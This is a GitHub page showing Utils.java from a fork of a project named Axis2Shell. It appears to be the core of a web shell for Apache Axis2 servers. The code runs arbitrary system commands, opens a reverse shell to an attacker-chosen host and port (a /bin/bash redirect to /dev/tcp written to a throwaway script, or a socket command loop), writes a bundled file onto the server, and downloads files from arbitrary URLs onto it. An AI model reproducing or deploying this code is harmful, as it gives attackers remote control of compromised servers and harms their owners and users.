forked from Svti/Axis2Shell
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Utils.java
132 lines (116 loc) · 3.36 KB
/
Utils.java
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
import java.io.BufferedReader;
import java.io.File;
import java.io.FileOutputStream;
import java.io.FileWriter;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.net.Socket;
import java.net.URL;
import java.net.URLConnection;
public class Utils {
static String os = System.getProperty("os.name").toLowerCase();
public static String exec(String cmd) {
String result="";
try {
if (cmd!=null&&cmd.trim().length()>0) {
if (os.startsWith("windows")) {
cmd="cmd.exe /c "+ cmd;
}else {
cmd="/bin/sh -c "+ cmd;
}
InputStream inputStream= Runtime.getRuntime().exec(cmd).getInputStream();
int read=0;
while ((read=inputStream.read())!=-1) {
result+=(char)read;
}
}
} catch (Exception e) {
result=e.getMessage();
}
return result;
}
public static String shell(String host, int port) {
String result = "";
if (host != null && host.trim().length() > 0 && port > 0) {
try {
if (os.startsWith("linux")) {
String name="wooyun.sh";
File file=new File(name);
FileWriter writer=new FileWriter(file);
writer.write("/bin/bash -i > /dev/tcp/"+host+"/"+port+" 0<&1 2>&1"+"\n");
writer.flush();
writer.close();
Runtime.getRuntime().exec("chmod u+x "+name);
Process process = Runtime.getRuntime().exec("bash "+name);
process.waitFor();
file.delete();
} else {
Socket socket = new Socket(host, port);
OutputStream out = socket.getOutputStream();
InputStream in = socket.getInputStream();
out.write(("whoami:\t" + exec("whoami")).getBytes());
int a = 0;
byte[] b = new byte[4096];
while ((a = in.read(b)) != -1) {
out.write(exec(new String(b, 0, a, "UTF-8").trim()).getBytes("UTF-8"));
}
}
} catch (Exception e) {
result = e.getMessage();
}
} else {
result = "host and port are required";
}
return result;
}
public static String upload(String path) {
String result="";
try {
if (path!=null&&path.trim().length()>0) {
FileOutputStream fos=new FileOutputStream(new File(path));
InputStream inputStream =new Utils().getClass().getResourceAsStream("/resource/one.txt");
BufferedReader reader = new BufferedReader(new InputStreamReader(inputStream));
String temp = "";
while (reader.ready()) {
temp += reader.readLine() + "\n";
}
fos.write(temp.getBytes());
fos.flush();
fos.close();
result="Upload Success";
}else {
result="Path is required";
}
} catch (Exception e) {
result =e.getMessage();
}
return result;
}
public static String download(String url, String path) {
String result="";
try {
if (url!=null&&url.trim().length()>0&&path!=null&&path.trim().length()>0) {
URLConnection conn=new URL(url).openConnection();
conn.setReadTimeout(10*60*1000);
conn.setReadTimeout(10*60*1000);
InputStream inputStream=conn.getInputStream();
int read=0;
FileOutputStream fos=new FileOutputStream(new File(path));
while ((read=inputStream.read())!=-1) {
fos.write(read);
}
fos.flush();
fos.close();
}else {
result="Url and path are required";
}
} catch (Exception e) {
result =e.getMessage();
}
return result;
}
public static String getClassPath() {
return new Utils().getClass().getClassLoader().getResource("/").getPath();
}
}